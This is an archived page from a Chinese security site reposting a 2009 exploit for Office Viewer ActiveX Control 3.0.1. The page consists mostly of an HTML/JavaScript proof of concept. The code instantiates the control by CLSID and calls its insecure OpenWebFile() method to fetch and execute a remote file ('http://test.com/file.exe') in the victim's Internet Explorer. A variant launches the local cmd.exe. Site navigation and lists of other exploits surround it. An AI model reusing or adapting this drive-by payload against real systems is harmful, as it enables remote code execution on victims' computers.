首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Office Viewer ActiveX Control 3.0.1 Remote File Execution Exploit
来源:www.vfcocus.net 作者:Houssamix 发布时间:2009-01-14  
=======================================================================================<br>
Author: Houssamix    <br>
=======================================================================================<br>

Office Viewer ActiveX Control v 3.0.1 Remote File execution exploit <br>
download : http://www.anydraw.com/download/EOfficeOCX.exe <br>


Tested on Windows XP Professional SP2 , with Internet Explorer 6 <br><br>

description : this use to insecure methods "OpenWebFile()" for execute remote file in pc victime <br>
u can also execute a local file in pc victime usign this methode "Open()" , just change the function  do_it with this : <b>
function Do_it()
{
   File = "c:\\windows\\system32\\cmd.exe"
   hsmx.OpenWebFile(File)
}
<br>
=======================================================================================<br>
<HTML>
<BODY>
<object id=hsmx classid="clsid:{97AF4A45-49BE-4485-9F55-91AB40F288F2}"></object>

<SCRIPT>

function Do_it()
{
   File = "http://test.com/file.exe"
   hsmx.OpenWebFile(File)
}


</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="exploit">

</body>
</HTML>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Office Viewer ActiveX Control
·PowerPoint Viewer OCX 3.1 Remo
·Word Viewer OCX 3.2 ActiveX (S
·dBpowerAMP Audio Player 2 .PLS
·VUPlayer 2.49 .ASX File (Unive
·>HSPell 1.1 (cilla.cgi) Remote
·>HSPell 1.1 (cilla.cgi) Remote
·Winamp <= 5.541 (mp3/aiff) Mul
·PowerPoint Viewer OCX 3.1 Remo
·ExcelOCX ActiveX 3.2 (Download
·Nofeel FTP Server 3.6 (CWD) Re
·Triologic Media Player 7 (.m3u
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved